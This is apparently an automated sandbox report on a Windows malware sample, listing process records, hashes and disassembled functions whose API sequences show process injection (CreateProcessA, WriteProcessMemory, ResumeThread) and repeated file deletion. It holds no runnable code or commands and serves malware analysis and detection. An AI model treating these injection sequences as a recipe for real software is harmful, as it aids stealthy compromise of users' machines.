                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:43
                                                                                                                                                                        Start time:00:41:43
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:44
                                                                                                                                                                        Start time:00:41:43
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:9.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:10.6%
                                                                                                                                                                          Total number of Nodes:208
                                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                                          execution_graph 2985 401000 2986 40100c VirtualAlloc 2985->2986 2988 401073 2986->2988 3184 2222f63 3185 2222f68 3184->3185 3186 2222f6e lstrlen 3185->3186 3187 2222f85 3186->3187 2989 2220000 2991 2220005 2989->2991 3006 2220ce8 2991->3006 2993 2220011 3009 22233ca 2993->3009 2995 2220016 3013 222098b OpenMutexA 2995->3013 2998 222038f 2999 222002e 2999->2998 3000 2220697 2999->3000 3028 22206a0 2999->3028 3034 22206e6 3000->3034 3003 2220833 3004 22206dd 3004->3003 3038 2220835 3004->3038 3048 2220c63 GetPEB 3006->3048 3008 2220ced 3008->2993 3010 22233ea 3009->3010 3050 2223409 GetVolumeInformationA 3010->3050 3012 2223405 3012->2995 3014 22209b3 GetStartupInfoA 3013->3014 3015 222001b ExitProcess 3013->3015 3052 22209fd 3014->3052 3015->2999 3017 22209f6 3017->3015 3018 2220a02 CreateProcessA 3017->3018 3019 2220a12 Wow64GetThreadContext 3018->3019 3020 2220b10 3018->3020 3019->3020 3022 2220a3a VirtualProtectEx 3019->3022 3020->3015 3065 2220b17 3020->3065 3022->3020 3023 2220a65 DuplicateHandle 3022->3023 3023->3020 3024 2220aa6 WriteProcessMemory 3023->3024 3024->3020 3025 2220ad4 ResumeThread 3024->3025 3026 2220ae5 Sleep OpenMutexA 3025->3026 3026->3015 3027 2220b0b 3026->3027 3027->3020 3027->3026 3029 22206a5 3028->3029 3030 22206e6 3 API calls 3029->3030 3032 22206dd 3030->3032 3031 2220833 3031->3000 3032->3031 3033 2220835 3 API calls 3032->3033 3033->3031 3036 22206eb 3034->3036 3035 2220833 3035->3004 3036->3035 3037 2220835 3 API calls 3036->3037 3037->3035 3041 2220864 3038->3041 3039 222088a 3039->3003 3040 2220887 3040->3039 3043 2220ce8 GetPEB 3040->3043 3041->3039 3041->3040 3042 22208fd 3 API calls 3041->3042 3042->3040 3044 2220909 3043->3044 3045 2220667 3 API calls 3044->3045 3047 2220913 3045->3047 3046 2220962 3 API calls 3046->3047 3047->3046 3049 2220c6f 3048->3049 3049->3008 3049->3049 3051 222342b 3050->3051 3051->3012 3067 2223677 3052->3067 3054 2220a02 CreateProcessA 3055 2220a12 Wow64GetThreadContext 3054->3055 3056 2220b10 3054->3056 3055->3056 3059 2220a3a VirtualProtectEx 3055->3059 3057 2220b15 3056->3057 3058 2220b17 6 API calls 3056->3058 3057->3017 3058->3057 3059->3056 3060 2220a65 DuplicateHandle 3059->3060 3060->3056 3061 2220aa6 WriteProcessMemory 3060->3061 3061->3056 3062 2220ad4 ResumeThread 3061->3062 3063 2220ae5 Sleep OpenMutexA 3062->3063 3063->3057 3064 2220b0b 3063->3064 3064->3056 3064->3063 3069 2220b25 3065->3069 3068 2223689 3067->3068 3068->3054 3068->3068 3070 2220ce8 GetPEB 3069->3070 3071 2220b31 3070->3071 3076 2220b4b 3071->3076 3073 2220b44 3082 2220b89 3073->3082 3077 2223677 3076->3077 3078 2220b50 LoadLibraryA 3077->3078 3079 2220b66 3078->3079 3080 2220b89 5 API calls 3079->3080 3081 2220b7b 3079->3081 3080->3081 3081->3073 3084 2220b8e 3082->3084 3083 2220bd0 3092 22208d7 3083->3092 3084->3083 3087 2220ba1 OpenProcess 3084->3087 3087->3083 3089 2220bb2 3087->3089 3089->3083 3090 2220bc8 ExitProcess 3089->3090 3095 22208dd 3092->3095 3101 22208fd 3095->3101 3102 2220ce8 GetPEB 3101->3102 3103 2220909 3102->3103 3107 2220667 3103->3107 3106 2220913 3115 2220962 3106->3115 3108 222066a 3107->3108 3109 22206a0 3 API calls 3108->3109 3110 2220697 3109->3110 3111 22206e6 3 API calls 3110->3111 3112 22206dd 3111->3112 3113 2220833 3112->3113 3114 2220835 3 API calls 3112->3114 3113->3106 3114->3113 3116 2220ce8 GetPEB 3115->3116 3117 222096e 3116->3117 3118 2220978 Sleep RtlExitUserThread 3117->3118 3169 2224981 3170 2224994 3169->3170 3171 2224a87 3170->3171 3172 22249d2 CreateEventA 3170->3172 3173 22249f5 3172->3173 3173->3171 3174 2224d77 WaitForSingleObject 3173->3174 3174->3173 3123 22238a7 3124 22238ac 3123->3124 3127 22238f2 3124->3127 3131 222260c 3127->3131 3132 222261a 3131->3132 3188 2223d6a 3189 2223d6f 3188->3189 3190 22239d7 2 API calls 3189->3190 3191 2223d8a 3190->3191 3192 222382b 2 API calls 3191->3192 3193 2223d8f 3192->3193 3194 22234ea lstrlen 3197 2222790 3194->3197 3196 2223503 VirtualFree CloseHandle 3198 22227a1 3197->3198 3198->3196 3199 22231ea 3200 22231ef 3199->3200 3201 222320d lstrcat 3200->3201 3202 222321a 3201->3202 3203 2223242 GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3202->3203 3204 222329a 3202->3204 3203->3204 3205 2224d49 3206 2224d72 3205->3206 3207 2224d56 3205->3207 3207->3206 3208 2224d68 SetEvent 3207->3208 3208->3206 3119 4d0000 VirtualProtect 3120 4d034e 3119->3120 3121 4d0528 VirtualProtect 3120->3121 3122 4d06d0 VirtualProtect 3120->3122 3121->3120 3175 2220b8f 3176 2220ba1 OpenProcess 3175->3176 3177 2220bb2 3176->3177 3178 2220bd0 3176->3178 3177->3178 3182 2220bc8 ExitProcess 3177->3182 3179 22208d7 3 API calls 3178->3179 3180 2220bd5 3179->3180 3181 2220c63 GetPEB 3180->3181 3183 2220bda 3181->3183 3183->3183 3133 2223f2c 3134 2223f5d 3133->3134 3135 2223f31 3133->3135 3136 2223f5f 3135->3136 3137 2223f4f GetModuleHandleA 3135->3137 3139 2223f6a Sleep 3136->3139 3144 222403f 3137->3144 3140 2223f9c 3139->3140 3141 2223f7a Sleep 3140->3141 3142 2223f9c 3141->3142 3143 2223f8a Sleep 3142->3143 3143->3134 3146 2224052 3144->3146 3145 22240ba 3145->3134 3146->3145 3148 22240be 3146->3148 3153 22239d7 RtlInitializeCriticalSection 3148->3153 3152 22240c8 3152->3145 3154 22239e7 VirtualAlloc 3153->3154 3154->3154 3155 22239ff 3154->3155 3156 222382b VirtualAlloc 3155->3156 3156->3156 3157 2223843 CreateThread 3156->3157 3157->3152 3158 2223f31 3159 2223f36 3158->3159 3160 2223f5f 3159->3160 3161 2223f4f GetModuleHandleA 3159->3161 3163 2223f6a Sleep 3160->3163 3162 222403f 4 API calls 3161->3162 3168 2223f5d 3162->3168 3164 2223f9c 3163->3164 3165 2223f7a Sleep 3164->3165 3166 2223f9c 3165->3166 3167 2223f8a Sleep 3166->3167 3167->3168 3209 2222951 3210 2223677 3209->3210 3211 2222956 LoadLibraryA 3210->3211 3212 222296c 3211->3212 3213 2222985 VirtualAlloc 3212->3213 3213->3213 3214 222299d 3213->3214 3232 22229ca 3214->3232 3233 2223677 3232->3233 3234 22229cf lstrcat 3233->3234 3235 22229e5 3234->3235 3249 2222a01 3235->3249 3250 2223677 3249->3250 3251 2222a06 lstrcat 3250->3251 3252 2222a1c 3251->3252 3262 2222a38 3252->3262 3263 2223677 3262->3263 3264 2222a3d lstrcat 3263->3264 3267 2222a44 3264->3267 3266 2222aae DeleteFileA 3266->3267 3267->3266 3268 2222af2 DeleteFileA 3267->3268 3269 2222b58 Sleep 3267->3269 3270 2222b42 DeleteFileA 3267->3270 3271 2222b71 3267->3271 3268->3267 3269->3267 3270->3269 3273 2222b82 3271->3273 3272 2222c65 Sleep 3272->3272 3272->3273 3273->3272 3274 2222d1b 3273->3274 3274->3267

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 23 401000-401009 24 40100c-401018 23->24 24->24 25 40101a-40102c 24->25 26 40102e-40103d 25->26 26->26 27 40103f-401043 26->27 27->26 28 401045-40106e VirtualAlloc call 401075 27->28 30 401073 28->30 30->30
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731690565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1731673500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID: alAl
                                                                                                                                                                          • API String ID: 4275171209-1316302345
                                                                                                                                                                          • Opcode ID: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                          • Instruction ID: 5af7c2372beb94d1e1b866602b7db5847228e6fe9b98f09dddad8bbdacf03bae
                                                                                                                                                                          • Opcode Fuzzy Hash: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                          • Instruction Fuzzy Hash: B1015A36A401618FD765CF18C841F41B3E1BF48325F1A81A5D989AB7A2C778FC92CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02220005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0222098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022209A5
                                                                                                                                                                            • Part of subcall function 0222098B: GetStartupInfoA.KERNEL32(00000000), ref: 022209BD
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0222001D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction ID: 9b01bd32b4734d43cd7822d2a3ce09566c9929df4a2bc8fcd7daff749e296663
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 1172126142D3E13FD7279BE04A64A657F78BF23208B0D11CBD4819E0BBD6665B0DC36A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004D0000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731777557.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4d0000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction ID: edb9f42e84e9acb5268bdc8ef3b11ac1aba30bff5fcf76add10a79f009a4e509
                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C3267B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 022209FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,022209F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02220A04
                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02220A2C
                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 02220A57
                                                                                                                                                                          • DuplicateHandle.KERNELBASE(000000FF,000000FF,?,02225834,00000000,00000000,00000002), ref: 02220A9C
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 02220ACA
                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 02220ADA
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02220AEA
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02220B01
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1738979855-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: 64aa664242fa0f3cac02608ec2a1345c4260278881ebe53ac80146cb32babac0
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 51315431650225AFEF225F50CC85BA977B8FF04748F0405D4AA49FE0E9DBB19A94CE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02223409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 479 2223409-2223462 GetVolumeInformationA call 2223634
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02223405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02223409
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction ID: ef526dd4302994baf07ba6721480da57dc664a80beff1f24e16eae2b631a67f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction Fuzzy Hash: DEF0FE75600154DBEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA309559CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 02221845 Relevance: .4, Instructions: 370COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                          • Instruction ID: 8ece365f4f5283b5c2b89a21aabbe93bc0fe7443345b4c2e230bffe3b8b7f352
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                          • Instruction Fuzzy Hash: D1C108254246A79EE7258E98C059BD2BFD1BB12318F489389C19D0F2DBC39B81EDC7D1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02220EA9 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                          • Instruction ID: 6602edf2c8a24e41f3779ce4a4368600094e14ad7e2c4918fc7bf3e611eab394
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                          • Instruction Fuzzy Hash: 52B108215687A79AE725CA98C0157D2BF95BB12328F085388C59D0F1E7C3B782DDC7C1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02220C63 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
                                                                                                                                                                          • Instruction ID: 22351c798e5c300c03ab915bb8bf1ee757685f9955ef961a242f159fb49d5589
                                                                                                                                                                          • Opcode Fuzzy Hash: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
                                                                                                                                                                          • Instruction Fuzzy Hash: F1D0C579621550CFCA56CB58C1D8E10B3B1FB88764B068495E80A8B766C335ED4ADE00
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02222951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(02222949,00000008,?,00000000,02222835,00000000), ref: 02222956
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02222993
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022229C1), ref: 022229D0
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022229F8), ref: 02222A07
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 2427c2239a895d8b035d21594502a8224baea8e2e08237041f70d4cff934cd15
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 23517272410324FEDB22AFB08C48FBB77ADEF40704F440595AE45EA059DA379688CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 022229CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022229C1), ref: 022229D0
                                                                                                                                                                            • Part of subcall function 02222A01: lstrcat.KERNEL32(00000000,022229F8), ref: 02222A07
                                                                                                                                                                            • Part of subcall function 02222A01: lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
                                                                                                                                                                            • Part of subcall function 02222A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
                                                                                                                                                                            • Part of subcall function 02222A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: b401efba0d7517ca2d7ebc34caba8fc9137897f10b68fa2c0d18b33c7655c636
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: F5413571410334FEDB22AFB08D48FAB76BDFF40704F404595AE45EA059DA379688CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02222A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 605 2222a01-2222a3e call 2223677 lstrcat call 2222525 call 2222a38 call 2223677 lstrcat 615 2222a44-2222a67 call 2222b71 call 222351b 605->615 619 2222a6c-2222a73 615->619 619->615 620 2222a75-2222a91 call 2223463 call 22226a7 619->620 625 2222a93 620->625 626 2222abe-2222ad5 call 22226a7 620->626 625->626 627 2222a95-2222aaa call 222271d 625->627 632 2222b02-2222b19 call 22226a7 626->632 633 2222ad7 626->633 627->626 634 2222aac 627->634 640 2222b1b 632->640 641 2222b1c-2222b35 call 2222ebb 632->641 633->632 635 2222ad9-2222aee call 222271d 633->635 634->626 638 2222aae-2222ab8 DeleteFileA 634->638 635->632 644 2222af0 635->644 638->626 640->641 647 2222b37-2222b40 call 222307b 641->647 648 2222b58-2222b6c Sleep 641->648 644->632 646 2222af2-2222afc DeleteFileA 644->646 646->632 647->648 651 2222b42-2222b52 DeleteFileA 647->651 648->619 651->648
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022229F8), ref: 02222A07
                                                                                                                                                                            • Part of subcall function 02222A38: lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
                                                                                                                                                                            • Part of subcall function 02222A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
                                                                                                                                                                            • Part of subcall function 02222A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
                                                                                                                                                                            • Part of subcall function 02222A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
                                                                                                                                                                            • Part of subcall function 02222A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
